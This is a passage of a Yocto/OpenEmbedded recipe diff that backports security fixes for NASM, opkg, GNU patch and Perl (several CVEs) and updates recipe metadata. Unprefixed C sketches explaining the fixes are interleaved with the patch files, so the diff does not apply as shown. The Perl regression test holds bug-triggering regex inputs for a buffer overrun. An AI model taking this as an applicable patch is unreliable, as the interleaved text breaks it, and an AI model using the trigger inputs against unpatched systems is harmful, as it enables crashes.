nasmlib/filename.c | 20 ++++++++++++++++++++
@@ -23,34 +23,32 @@ Signed-off-by: Joshua Watt <JPEWhacker@gmail.com>
stdlib/strlcat.c | 2 +-
test/elfdebugprefix.asm | 6 ++++++
test/performtest.pl | 12 ++++++++++--
- 12 files changed, 83 insertions(+), 10 deletions(-)
+ 12 files changed, 82 insertions(+), 9 deletions(-)
create mode 100644 test/elfdebugprefix.asm
diff --git a/asm/nasm.c b/asm/nasm.c
-index a0e1719..fc6c62e 100644
+index e5ae89a..7a7f8b4 100644
--- a/asm/nasm.c
+++ b/asm/nasm.c
-@@ -938,7 +938,8 @@ enum text_options {
- OPT_LIMIT,
+@@ -939,6 +939,7 @@ enum text_options {
OPT_KEEP_ALL,
OPT_NO_LINE,
-- OPT_DEBUG
-+ OPT_DEBUG,
-+ OPT_DEBUG_PREFIX_MAP
+ OPT_DEBUG,
++ OPT_DEBUG_PREFIX_MAP,
+ OPT_REPRODUCIBLE
};
enum need_arg {
- ARG_NO,
-@@ -970,6 +971,7 @@ static const struct textargs textopts[] = {
+@@ -971,6 +972,7 @@ static const struct textargs textopts[] = {
{"keep-all", OPT_KEEP_ALL, ARG_NO, 0},
{"no-line", OPT_NO_LINE, ARG_NO, 0},
{"debug", OPT_DEBUG, ARG_MAYBE, 0},
+ {"debug-prefix-map", OPT_DEBUG_PREFIX_MAP, true, 0},
+ {"reproducible", OPT_REPRODUCIBLE, ARG_NO, 0},
{NULL, OPT_BOGUS, ARG_NO, 0}
};
-
-@@ -1332,6 +1334,26 @@ static bool process_arg(char *p, char *q, int pass)
- case OPT_DEBUG:
- debug_nasm = param ? strtoul(param, NULL, 10) : debug_nasm+1;
+@@ -1337,6 +1339,26 @@ static bool process_arg(char *p, char *q, int pass)
+ case OPT_REPRODUCIBLE:
+ reproducible = true;
break;
+ case OPT_DEBUG_PREFIX_MAP: {
+ struct debug_prefix_list *d;
@@ -75,7 +73,7 @@ index a0e1719..fc6c62e 100644
case OPT_HELP:
help(stdout);
exit(0);
-@@ -2297,6 +2319,8 @@ static void help(FILE *out)
+@@ -2304,6 +2326,8 @@ static void help(FILE *out)
" -w-x disable warning x (also -Wno-x)\n"
" -w[+-]error promote all warnings to errors (also -Werror)\n"
" -w[+-]error=x promote warning x to errors (also -Werror=x)\n"
@@ -85,7 +83,7 @@ index a0e1719..fc6c62e 100644
fprintf(out, " %-20s %s\n",
diff --git a/include/nasmlib.h b/include/nasmlib.h
-index e9bfbcc..98fc653 100644
+index 438178d..4c3e90d 100644
--- a/include/nasmlib.h
+++ b/include/nasmlib.h
@@ -250,10 +250,19 @@ int64_t readstrnum(char *str, int length, bool *warn);
@@ -181,10 +179,10 @@ index 54b22f8..c4a412c 100644
static void as86_cleanup(void)
diff --git a/output/outcoff.c b/output/outcoff.c
-index bcd9ff3..15bfcf3 100644
+index 58fa024..14baf7b 100644
--- a/output/outcoff.c
+++ b/output/outcoff.c
-@@ -1095,14 +1095,14 @@ static void coff_symbol(char *name, int32_t strpos, int32_t value,
+@@ -1072,14 +1072,14 @@ static void coff_symbol(char *name, int32_t strpos, int32_t value,
static void coff_write_symbols(void)
{
@@ -215,7 +213,7 @@ index 61af020..1292958 100644
nsects = sectlen = 0;
syms = saa_init((int32_t)sizeof(struct elf_symbol));
diff --git a/output/outieee.c b/output/outieee.c
-index 4cc0f0f..2468724 100644
+index 6d6d4b2..cdb8333 100644
--- a/output/outieee.c
+++ b/output/outieee.c
@@ -207,7 +207,7 @@ static void ieee_unqualified_name(char *, char *);
@@ -228,10 +226,10 @@ index 4cc0f0f..2468724 100644
fpubhead = NULL;
fpubtail = &fpubhead;
diff --git a/output/outobj.c b/output/outobj.c
-index 0d4d311..d8dd6a0 100644
+index 56b43f9..fefea94 100644
--- a/output/outobj.c
+++ b/output/outobj.c
-@@ -638,7 +638,7 @@ static enum directive_result obj_directive(enum directive, char *);
+@@ -644,7 +644,7 @@ static enum directive_result obj_directive(enum directive, char *);
static void obj_init(void)
{
diff --git a/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch b/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch
new file mode 100644
index 0000000000..1bd49c9fd9
--- /dev/null
+++ b/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch
@@ -0,0 +1,104 @@
+From b37677f7e40276bd8f504584bcba2c092f1146a8 Mon Sep 17 00:00:00 2001
+From: "H. Peter Anvin" <hpa@zytor.com>
+Date: Mon, 7 Nov 2022 10:26:03 -0800
+Subject: [PATCH] quote_for_pmake: fix counter underrun resulting in segfault
+
+while (nbs--) { ... } ends with nbs == -1. Rather than a minimal fix,
+introduce mempset() to make these kinds of errors less likely in the
+future.
+
+Fixes: https://bugzilla.nasm.us/show_bug.cgi?id=3392815
+Reported-by: <13579and24680@gmail.com>
+Signed-off-by: H. Peter Anvin <hpa@zytor.com>
+
+Upstream-Status: Backport
+CVE: CVE-2022-44370
+
+Reference to upstream patch:
+[https://github.com/netwide-assembler/nasm/commit/2d4e6952417ec6f08b6f135d2b5d0e19b7dae30d]
+
+Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com>
+---
+ asm/nasm.c | 12 +++++-------
+ configure.ac | 1 +
+ include/compiler.h | 7 +++++++
+ 3 files changed, 13 insertions(+), 7 deletions(-)
+
+diff --git a/asm/nasm.c b/asm/nasm.c
+index 7a7f8b4..675cff4 100644
+--- a/asm/nasm.c
++++ b/asm/nasm.c
+@@ -1,6 +1,6 @@
+ /* ----------------------------------------------------------------------- *
+ *
+- * Copyright 1996-2020 The NASM Authors - All Rights Reserved
++ * Copyright 1996-2022 The NASM Authors - All Rights Reserved
+ * See the file AUTHORS included with the NASM distribution for
+ * the specific copyright holders.
+ *
+@@ -814,8 +814,7 @@ static char *quote_for_pmake(const char *str)
+ }
+
+ /* Convert N backslashes at the end of filename to 2N backslashes */
+- if (nbs)
+- n += nbs;
++ n += nbs;
+
+ os = q = nasm_malloc(n);
+
+@@ -824,10 +823,10 @@ static char *quote_for_pmake(const char *str)
+ switch (*p) {
+ case ' ':
+ case '\t':
+- while (nbs--)
+- *q++ = '\\';
++ q = mempset(q, '\\', nbs);
+ *q++ = '\\';
+ *q++ = *p;
++ nbs = 0;
+ break;
+ case '$':
+ *q++ = *p;
+@@ -849,9 +848,8 @@ static char *quote_for_pmake(const char *str)
+ break;
+ }
+ }
+- while (nbs--)
+- *q++ = '\\';
+
++ q = mempset(q, '\\', nbs);
+ *q = '\0';
+
+ return os;
+diff --git a/configure.ac b/configure.ac
+index 39680b1..940ebe2 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -199,6 +199,7 @@ AC_CHECK_FUNCS(strrchrnul)
+ AC_CHECK_FUNCS(iscntrl)
+ AC_CHECK_FUNCS(isascii)
+ AC_CHECK_FUNCS(mempcpy)
++AC_CHECK_FUNCS(mempset)
+
+ AC_CHECK_FUNCS(getuid)
+ AC_CHECK_FUNCS(getgid)
+diff --git a/include/compiler.h b/include/compiler.h
+index db3d6d6..b64da6a 100644
+--- a/include/compiler.h
++++ b/include/compiler.h
+@@ -256,6 +256,13 @@ static inline void *mempcpy(void *dst, const void *src, size_t n)
+ }
+ #endif
+
++#ifndef HAVE_MEMPSET
++static inline void *mempset(void *dst, int c, size_t n)
++{
++ return (char *)memset(dst, c, n) + n;
++}
++#endif
++
+ /*
+ * Hack to support external-linkage inline functions
+ */
+--
+2.40.0
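
The quote_for_pmake() hunks above replace two "while (nbs--)" loops, which exit with nbs underflowing to (size_t)-1, with the new mempset() helper. A minimal standalone sketch of that helper and the pattern it avoids follows; it is illustrative only and does not use the NASM sources.

    /*
     * Sketch: mempset() fills n bytes and returns a pointer just past them,
     * mirroring mempcpy(), so callers never decrement a counter past zero.
     */
    #include <stdio.h>
    #include <string.h>

    static void *mempset(void *dst, int c, size_t n)
    {
        return (char *)memset(dst, c, n) + n;
    }

    int main(void)
    {
        char out[16];
        char *q = out;
        size_t nbs = 3;            /* pending backslashes, as in quote_for_pmake */

        q = mempset(q, '\\', nbs); /* write exactly nbs backslashes */
        *q++ = ' ';
        *q = '\0';
        nbs = 0;                   /* reset, mirroring the patched code path */

        printf("quoted: \"%s\" (nbs=%zu)\n", out, nbs);
        return 0;
    }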
diff --git a/meta/recipes-devtools/nasm/nasm_2.15.03.bb b/meta/recipes-devtools/nasm/nasm_2.15.05.bb
index 5c4e28de06..c5638debdd 100644
--- a/meta/recipes-devtools/nasm/nasm_2.15.03.bb
+++ b/meta/recipes-devtools/nasm/nasm_2.15.05.bb
@@ -1,18 +1,21 @@
SUMMARY = "General-purpose x86 assembler"
SECTION = "devel"
+HOMEPAGE = "http://www.nasm.us/"
+DESCRIPTION = "The Netwide Assembler (NASM) is an assembler and disassembler for the Intel x86 architecture."
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://LICENSE;md5=90904486f8fbf1861cf42752e1a39efe"
SRC_URI = "http://www.nasm.us/pub/nasm/releasebuilds/${PV}/nasm-${PV}.tar.bz2 \
file://0001-stdlib-Add-strlcat.patch \
file://0002-Add-debug-prefix-map-option.patch \
+ file://CVE-2022-44370.patch \
"
-SRC_URI[sha256sum] = "04e7343d9bf112bffa9fda86f6c7c8b120c2ccd700b882e2db9f57484b1bd778"
+SRC_URI[sha256sum] = "3c4b8339e5ab54b1bcb2316101f8985a5da50a3f9e504d43fa6f35668bee2fd0"
EXTRA_AUTORECONF_append = " -I autoconf/m4"
-inherit autotools
+inherit autotools-brokensep
BBCLASSEXTEND = "native"
diff --git a/meta/recipes-devtools/ninja/ninja_1.10.0.bb b/meta/recipes-devtools/ninja/ninja_1.10.0.bb
index ba3398c5d6..755b73a173 100644
--- a/meta/recipes-devtools/ninja/ninja_1.10.0.bb
+++ b/meta/recipes-devtools/ninja/ninja_1.10.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Ninja is a small build system with a focus on speed."
HOMEPAGE = "https://ninja-build.org/"
+DESCRIPTION = "Ninja is a small build system with a focus on speed. It differs from other build systems in two major respects: it is designed to have its input files generated by a higher-level build system, and it is designed to run builds as fast as possible."
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://COPYING;md5=a81586a64ad4e476c791cda7e2f2c52e"
@@ -7,7 +8,7 @@ DEPENDS = "re2c-native ninja-native"
SRCREV = "ed7f67040b370189d989adbd60ff8ea29957231f"
-SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release"
+SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release;protocol=https"
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)"
S = "${WORKDIR}/git"
@@ -28,3 +29,6 @@ do_install() {
}
BBCLASSEXTEND = "native nativesdk"
+
+# This is a different Ninja
+CVE_CHECK_WHITELIST += "CVE-2021-4336"
diff --git a/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch b/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch
new file mode 100644
index 0000000000..bec21e67f4
--- /dev/null
+++ b/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch
@@ -0,0 +1,50 @@
+From 8b45a3c4cab95382beea1ecdddeb2e4a9ed14aba Mon Sep 17 00:00:00 2001
+From: Jo-Philipp Wich <jo@mein.io>
+Date: Wed, 1 Apr 2020 21:47:40 +0200
+Subject: [PATCH 001/104] file_util.c: fix possible bad memory access in
+ file_read_line_alloc()
+
+In the case of a zero length string being returned by fgets(), the condition
+checking for a trailing new line would perform a bad memory access outside
+of `buf`. This might happen when line with a leading null byte is read.
+
+Avoid this case by checking that the string has a length of at least one
+byte. Also change the unsigned int types to size_t to store length values
+while we're at it.
+
+Upstream-Status: Backport [https://github.com/ndmsystems/opkg/commit/8b45a3c4cab95382beea1ecdddeb2e4a9ed14aba]
+
+Signed-off-by: Jo-Philipp Wich <jo@mein.io>
+Signed-off-by: Alejandro del Castillo <alejandro.delcastillo@ni.com>
+Signed-off-by: virendra thakur <virendrak@kpit.com>
+---
+ libopkg/file_util.c | 7 ++-----
+ 1 file changed, 2 insertions(+), 5 deletions(-)
+
+diff --git a/libopkg/file_util.c b/libopkg/file_util.c
+index fbed7b4..ee9f59d 100644
+--- a/libopkg/file_util.c
++++ b/libopkg/file_util.c
+@@ -127,17 +127,14 @@ char *file_readlink_alloc(const char *file_name)
+ */
+ char *file_read_line_alloc(FILE * fp)
+ {
++ size_t buf_len, line_size;
+ char buf[BUFSIZ];
+- unsigned int buf_len;
+ char *line = NULL;
+- unsigned int line_size = 0;
+ int got_nl = 0;
+
+- buf[0] = '\0';
+-
+ while (fgets(buf, BUFSIZ, fp)) {
+ buf_len = strlen(buf);
+- if (buf[buf_len - 1] == '\n') {
++ if (buf_len > 0 && buf[buf_len - 1] == '\n') {
+ buf_len--;
+ buf[buf_len] = '\0';
+ got_nl = 1;
+--
+2.25.1
+
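
The file_read_line_alloc() hunk above only inspects buf[buf_len - 1] once the length is known to be non-zero. A standalone sketch of that guard, assuming nothing from the libopkg tree:

    /*
     * Sketch: a line beginning with a NUL byte makes strlen() return 0, so the
     * trailing-newline check must only run when buf_len > 0.
     */
    #include <stdio.h>
    #include <string.h>

    int main(void)
    {
        char buf[BUFSIZ];

        while (fgets(buf, sizeof(buf), stdin)) {
            size_t buf_len = strlen(buf);

            if (buf_len > 0 && buf[buf_len - 1] == '\n') {
                buf_len--;
                buf[buf_len] = '\0';
            }
            printf("read %zu byte(s)\n", buf_len);
        }
        return 0;
    }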
diff --git a/meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch b/meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch
new file mode 100644
index 0000000000..4578fa33be
--- /dev/null
+++ b/meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch
@@ -0,0 +1,24 @@
+Having CLEAN_DATE come from the current date doesn't allow for build
+reproducibility. Add the option of using SOURCE_DATE_EPOCH if set,
+which for OE it will be.
+
+Upstream-Status: Pending
+RP 2021/2/2
+
+Index: opkg-0.4.4/configure.ac
+===================================================================
+--- opkg-0.4.4.orig/configure.ac
++++ opkg-0.4.4/configure.ac
+@@ -281,7 +281,11 @@ AC_FUNC_UTIME_NULL
+ AC_FUNC_VPRINTF
+ AC_CHECK_FUNCS([memmove memset mkdir regcomp strchr strcspn strdup strerror strndup strrchr strstr strtol strtoul sysinfo utime])
+
+-CLEAN_DATE=`date +"%B %Y" | tr -d '\n'`
++if ! test -z "$SOURCE_DATE_EPOCH" ; then
++ CLEAN_DATE=`LC_ALL=C date -d @$SOURCE_DATE_EPOCH +"%B %Y" | tr -d '\n'`
++else
++ CLEAN_DATE=`date +"%B %Y" | tr -d '\n'`
++fi
+
+ AC_SUBST([CLEAN_DATE])
+
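
The configure.ac change above derives CLEAN_DATE from SOURCE_DATE_EPOCH when that variable is set. A small C sketch of the same idea (the patch itself does this in shell with `date -d @$SOURCE_DATE_EPOCH +"%B %Y"`); the names here are illustrative only:

    /*
     * Sketch: derive a reproducible "Month Year" stamp from SOURCE_DATE_EPOCH,
     * falling back to the current time when the variable is unset.
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <time.h>

    int main(void)
    {
        const char *sde = getenv("SOURCE_DATE_EPOCH");
        time_t when = sde ? (time_t)strtoll(sde, NULL, 10) : time(NULL);
        char clean_date[32];

        /* gmtime() avoids depending on the build host's timezone. */
        strftime(clean_date, sizeof(clean_date), "%B %Y", gmtime(&when));
        printf("CLEAN_DATE=%s\n", clean_date);
        return 0;
    }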
diff --git a/meta/recipes-devtools/opkg/opkg_0.4.2.bb b/meta/recipes-devtools/opkg/opkg_0.4.2.bb
index 66a74dc5ed..3ebc27c8ee 100644
--- a/meta/recipes-devtools/opkg/opkg_0.4.2.bb
+++ b/meta/recipes-devtools/opkg/opkg_0.4.2.bb
@@ -2,6 +2,7 @@ SUMMARY = "Open Package Manager"
SUMMARY_libopkg = "Open Package Manager library"
SECTION = "base"
HOMEPAGE = "http://code.google.com/p/opkg/"
+DESCRIPTION = "Opkg is a lightweight package management system based on Ipkg."
BUGTRACKER = "http://code.google.com/p/opkg/issues/list"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f \
@@ -14,6 +15,8 @@ PE = "1"
SRC_URI = "http://downloads.yoctoproject.org/releases/${BPN}/${BPN}-${PV}.tar.gz \
file://opkg.conf \
file://0001-opkg_conf-create-opkg.lock-in-run-instead-of-var-run.patch \
+ file://sourcedateepoch.patch \
+ file://0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch \
file://run-ptest \
"
@@ -48,7 +51,9 @@ EXTRA_OECONF_class-native = "--localstatedir=/${@os.path.relpath('${localstatedi
do_install_append () {
install -d ${D}${sysconfdir}/opkg
install -m 0644 ${WORKDIR}/opkg.conf ${D}${sysconfdir}/opkg/opkg.conf
- echo "option lists_dir ${OPKGLIBDIR}/opkg/lists" >>${D}${sysconfdir}/opkg/opkg.conf
+ echo "option lists_dir ${OPKGLIBDIR}/opkg/lists" >>${D}${sysconfdir}/opkg/opkg.conf
+ echo "option info_dir ${OPKGLIBDIR}/opkg/info" >>${D}${sysconfdir}/opkg/opkg.conf
+ echo "option status_file ${OPKGLIBDIR}/opkg/status" >>${D}${sysconfdir}/opkg/opkg.conf
# We need to create the lock directory
install -d ${D}${OPKGLIBDIR}/opkg
diff --git a/meta/recipes-devtools/orc/orc_0.4.31.bb b/meta/recipes-devtools/orc/orc_0.4.31.bb
index cd4dc31d70..ba2c349c9f 100644
--- a/meta/recipes-devtools/orc/orc_0.4.31.bb
+++ b/meta/recipes-devtools/orc/orc_0.4.31.bb
@@ -1,5 +1,6 @@
SUMMARY = "Optimised Inner Loop Runtime Compiler"
HOMEPAGE = "http://gstreamer.freedesktop.org/modules/orc.html"
+DESCRIPTION = "Optimised Inner Loop Runtime Compiler is a Library and set of tools for compiling and executing SIMD assembly language-like programs that operate on arrays of data."
LICENSE = "BSD-2-Clause & BSD-3-Clause"
LIC_FILES_CHKSUM = "file://COPYING;md5=1400bd9d09e8af56b9ec982b3d85797e"
diff --git a/meta/recipes-devtools/patch/patch/CVE-2019-20633.patch b/meta/recipes-devtools/patch/patch/CVE-2019-20633.patch
new file mode 100644
index 0000000000..03988a179c
--- /dev/null
+++ b/meta/recipes-devtools/patch/patch/CVE-2019-20633.patch
@@ -0,0 +1,31 @@
+From 15b158db3ae11cb835f2eb8d2eb48e09d1a4af48 Mon Sep 17 00:00:00 2001
+From: Andreas Gruenbacher <agruen@gnu.org>
+Date: Mon, 15 Jul 2019 19:10:02 +0200
+Subject: Avoid invalid memory access in context format diffs
+
+* src/pch.c (another_hunk): Avoid invalid memory access in context format
+diffs.
+
+CVE: CVE-2019-20633
+Upstream-Status: Backport[https://git.savannah.gnu.org/cgit/patch.git/patch/?id=15b158db3ae11cb835f2eb8d2eb48e09d1a4af48]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ src/pch.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/src/pch.c b/src/pch.c
+index a500ad9..cb54e03 100644
+--- a/src/pch.c
++++ b/src/pch.c
+@@ -1328,6 +1328,7 @@ another_hunk (enum diff difftype, bool rev)
+ ptrn_prefix_context = context;
+ ptrn_suffix_context = context;
+ if (repl_beginning
++ || p_end <= 0
+ || (p_end
+ != p_ptrn_lines + 1 + (p_Char[p_end - 1] == '\n')))
+ {
+--
+cgit v1.2.1
+
diff --git a/meta/recipes-devtools/patch/patch_2.7.6.bb b/meta/recipes-devtools/patch/patch_2.7.6.bb
index b5897b357a..1997af0c25 100644
--- a/meta/recipes-devtools/patch/patch_2.7.6.bb
+++ b/meta/recipes-devtools/patch/patch_2.7.6.bb
@@ -10,6 +10,7 @@ SRC_URI += "file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
file://0001-Invoke-ed-directly-instead-of-using-the-shell.patch \
file://0001-Don-t-leak-temporary-file-on-failed-ed-style-patch.patch \
file://0001-Don-t-leak-temporary-file-on-failed-multi-file-ed.patch \
+ file://CVE-2019-20633.patch \
"
SRC_URI[md5sum] = "4c68cee989d83c87b00a3860bcd05600"
diff --git a/meta/recipes-devtools/patchelf/patchelf_0.10.bb b/meta/recipes-devtools/patchelf/patchelf_0.10.bb
index 84e640773b..2bf3108f88 100644
--- a/meta/recipes-devtools/patchelf/patchelf_0.10.bb
+++ b/meta/recipes-devtools/patchelf/patchelf_0.10.bb
@@ -1,12 +1,15 @@
-SRC_URI = "git://github.com/NixOS/patchelf;protocol=https \
+SUMMARY = "Tool to allow editing of RPATH and interpreter fields in ELF binaries"
+DESCRIPTION = "PatchELF is a simple utility for modifying existing ELF executables and libraries."
+HOMEPAGE = "https://github.com/NixOS/patchelf"
+
+LICENSE = "GPLv3"
+
+SRC_URI = "git://github.com/NixOS/patchelf;protocol=https;branch=master \
file://handle-read-only-files.patch \
file://fix-adjusting-startPage.patch \
file://fix-phdrs.patch \
"
-LICENSE = "GPLv3"
-SUMMARY = "Tool to allow editing of RPATH and interpreter fields in ELF binaries"
-
SRCREV = "e1e39f3639e39360ceebb2f7ed533cede4623070"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/perl/files/CVE-2023-31484.patch b/meta/recipes-devtools/perl/files/CVE-2023-31484.patch
new file mode 100644
index 0000000000..0fea7bf8a8
--- /dev/null
+++ b/meta/recipes-devtools/perl/files/CVE-2023-31484.patch
@@ -0,0 +1,27 @@
+CVE: CVE-2023-31484
+Upstream-Status: Backport [ import from Ubuntu perl_5.30.0-9ubuntu0.5
+upstream https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 9c98370287f4e709924aee7c58ef21c85289a7f0 Mon Sep 17 00:00:00 2001
+From: Stig Palmquist <git@stig.io>
+Date: Tue, 28 Feb 2023 11:54:06 +0100
+Subject: [PATCH] Add verify_SSL=>1 to HTTP::Tiny to verify https server
+ identity
+
+---
+ lib/CPAN/HTTP/Client.pm | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/cpan/CPAN/lib/CPAN/HTTP/Client.pm b/cpan/CPAN/lib/CPAN/HTTP/Client.pm
+index 4fc792c26..a616fee20 100644
+--- a/cpan/CPAN/lib/CPAN/HTTP/Client.pm
++++ b/cpan/CPAN/lib/CPAN/HTTP/Client.pm
+@@ -32,6 +32,7 @@ sub mirror {
+
+ my $want_proxy = $self->_want_proxy($uri);
+ my $http = HTTP::Tiny->new(
++ verify_SSL => 1,
+ $want_proxy ? (proxy => $self->{proxy}) : ()
+ );
+
diff --git a/meta/recipes-devtools/perl/files/CVE-2023-47038.patch b/meta/recipes-devtools/perl/files/CVE-2023-47038.patch
new file mode 100644
index 0000000000..59252c560c
--- /dev/null
+++ b/meta/recipes-devtools/perl/files/CVE-2023-47038.patch
@@ -0,0 +1,121 @@
+As per https://ubuntu.com/security/CVE-2023-47100, CVE-2023-47100 is a duplicate of CVE-2023-47038.
+CVE: CVE-2023-47038 CVE-2023-47100
+Upstream-Status: Backport [ import from ubuntu perl_5.30.0-9ubuntu0.5
+upstream https://github.com/Perl/perl5/commit/12c313ce49b36160a7ca2e9b07ad5bd92ee4a010 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+Backport of:
+
+From 12c313ce49b36160a7ca2e9b07ad5bd92ee4a010 Mon Sep 17 00:00:00 2001
+From: Karl Williamson <khw@cpan.org>
+Date: Sat, 9 Sep 2023 11:59:09 -0600
+Subject: [PATCH 1/2] Fix read/write past buffer end: perl-security#140
+
+A package name may be specified in a \p{...} regular expression
+construct. If unspecified, "utf8::" is assumed, which is the package
+all official Unicode properties are in. By specifying a different
+package, one can create a user-defined property with the same
+unqualified name as a Unicode one. Such a property is defined by a sub
+whose name begins with "Is" or "In", and if the sub wishes to refer to
+an official Unicode property, it must explicitly specify the "utf8::".
+S_parse_uniprop_string() is used to parse the interior of both \p{} and
+the user-defined sub lines.
+
+In S_parse_uniprop_string(), it parses the input "name" parameter,
+creating a modified copy, "lookup_name", malloc'ed with the same size as
+"name". The modifications are essentially to create a canonicalized
+version of the input, with such things as extraneous white-space
+stripped off. I found it convenient to strip off the package specifier
+"utf8::". To to so, the code simply pretends "lookup_name" begins just
+after the "utf8::", and adjusts various other values to compensate.
+However, it missed the adjustment of one required one.
+
+This is only a problem when the property name begins with "perl" and
+isn't "perlspace" nor "perlword". All such ones are undocumented
+internal properties.
+
+What happens in this case is that the input is reparsed with slightly
+different rules in effect as to what is legal versus illegal. The
+problem is that "lookup_name" no longer is pointing to its initial
+value, but "name" is. Thus the space allocated for filling "lookup_name"
+is now shorter than "name", and as this shortened "lookup_name" is
+filled by copying suitable portions of "name", the write can be to
+unallocated space.
+
+The solution is to skip the "utf8::" when reparsing "name". Then both
+"lookup_name" and "name" are effectively shortened by the same amount,
+and there is no going off the end.
+
+This commit also does white-space adjustment so that things align
+vertically for readability.
+
+This can be easily backported to earlier Perl releases.
+---
+ regcomp.c | 17 +++++++++++------
+ t/re/pat_advanced.t | 8 ++++++++
+ 2 files changed, 19 insertions(+), 6 deletions(-)
+
+--- a/regcomp.c
++++ b/regcomp.c
+@@ -22606,7 +22606,7 @@ Perl_parse_uniprop_string(pTHX_
+ * compile perl to know about them) */
+ bool is_nv_type = FALSE;
+
+- unsigned int i, j = 0;
++ unsigned int i = 0, i_zero = 0, j = 0;
+ int equals_pos = -1; /* Where the '=' is found, or negative if none */
+ int slash_pos = -1; /* Where the '/' is found, or negative if none */
+ int table_index = 0; /* The entry number for this property in the table
+@@ -22717,9 +22717,13 @@ Perl_parse_uniprop_string(pTHX_
+ * all of them are considered to be for that package. For the purposes of
+ * parsing the rest of the property, strip it off */
+ if (non_pkg_begin == STRLENs("utf8::") && memBEGINPs(name, name_len, "utf8::")) {
+- lookup_name += STRLENs("utf8::");
+- j -= STRLENs("utf8::");
+- equals_pos -= STRLENs("utf8::");
++ lookup_name += STRLENs("utf8::");
++ j -= STRLENs("utf8::");
++ equals_pos -= STRLENs("utf8::");
++ i_zero = STRLENs("utf8::"); /* When resetting 'i' to reparse
++ from the beginning, it has to be
++ set past what we're stripping
++ off */
+ }
+
+ /* Here, we are either done with the whole property name, if it was simple;
+@@ -22997,7 +23001,8 @@ Perl_parse_uniprop_string(pTHX_
+
+ /* We set the inputs back to 0 and the code below will reparse,
+ * using strict */
+- i = j = 0;
++ i = i_zero;
++ j = 0;
+ }
+ }
+
+@@ -23018,7 +23023,7 @@ Perl_parse_uniprop_string(pTHX_
+ * separates two digits */
+ if (cur == '_') {
+ if ( stricter
+- && ( i == 0 || (int) i == equals_pos || i == name_len- 1
++ && ( i == i_zero || (int) i == equals_pos || i == name_len- 1
+ || ! isDIGIT_A(name[i-1]) || ! isDIGIT_A(name[i+1])))
+ {
+ lookup_name[j++] = '_';
+--- a/t/re/pat_advanced.t
++++ b/t/re/pat_advanced.t
+@@ -2524,6 +2524,14 @@ EOF
+ "", {}, "*COMMIT caused positioning beyond EOS");
+ }
+
++ { # perl-security#140, read/write past buffer end
++ fresh_perl_like('qr/\p{utf8::perl x}/',
++ qr/Illegal user-defined property name "utf8::perl x" in regex/,
++ {}, "perl-security#140");
++ fresh_perl_is('qr/\p{utf8::_perl_surrogate}/', "",
++ {}, "perl-security#140");
++ }
++
+
+ # !!! NOTE that tests that aren't at all likely to crash perl should go
+ # a ways above, above these last ones. There's a comment there that, like
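
The commit message above describes "lookup_name" being advanced past the stripped "utf8::" prefix while a later reparse of "name" restarted at index 0, so the copy could run past the end of the shorter allocation. A standalone sketch of that pointer/index mismatch and the i_zero adjustment; variable names other than those quoted above are hypothetical:

    /*
     * Sketch: lookup_name is allocated with the same size as name, then advanced
     * past the stripped "utf8::". Any reparse of name must start at i_zero (the
     * prefix length), otherwise up to strlen(name) bytes land in a shorter region.
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(void)
    {
        const char *name = "utf8::perl x";
        size_t name_len = strlen(name);
        size_t i_zero = strlen("utf8::");   /* where a reparse must restart */

        char *alloc = malloc(name_len + 1); /* same size as name */
        char *lookup_name = alloc + i_zero; /* prefix "stripped" by pointer bump */
        size_t j = 0;

        for (size_t i = i_zero; i < name_len; i++) /* i = 0 here would overrun */
            lookup_name[j++] = name[i];
        lookup_name[j] = '\0';

        printf("canonicalized: %s\n", lookup_name);
        free(alloc);
        return 0;
    }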
diff --git a/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb b/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
index a6fd7b1c07..c91b44cd6e 100644
--- a/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
+++ b/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
@@ -37,6 +37,7 @@ EXTRA_CPAN_BUILD_FLAGS = "--create_packlist=0"
do_install_append () {
rm -rf ${D}${docdir}/perl/html
+ sed -i "s:^#!.*:#!/usr/bin/env perl:" ${D}${bindir}/config_data
}
do_install_ptest() {
diff --git a/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb b/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
index bc154bbdc5..ef2b292352 100644
--- a/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
+++ b/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
@@ -53,6 +53,7 @@ do_install_ptest() {
chown -R root:root ${D}${PTEST_PATH}/samples
}
+RDEPENDS_${PN} += "perl-module-carp perl-module-file-spec"
RDEPENDS_${PN}-ptest += "perl-module-filehandle perl-module-if perl-module-test perl-module-test-more"
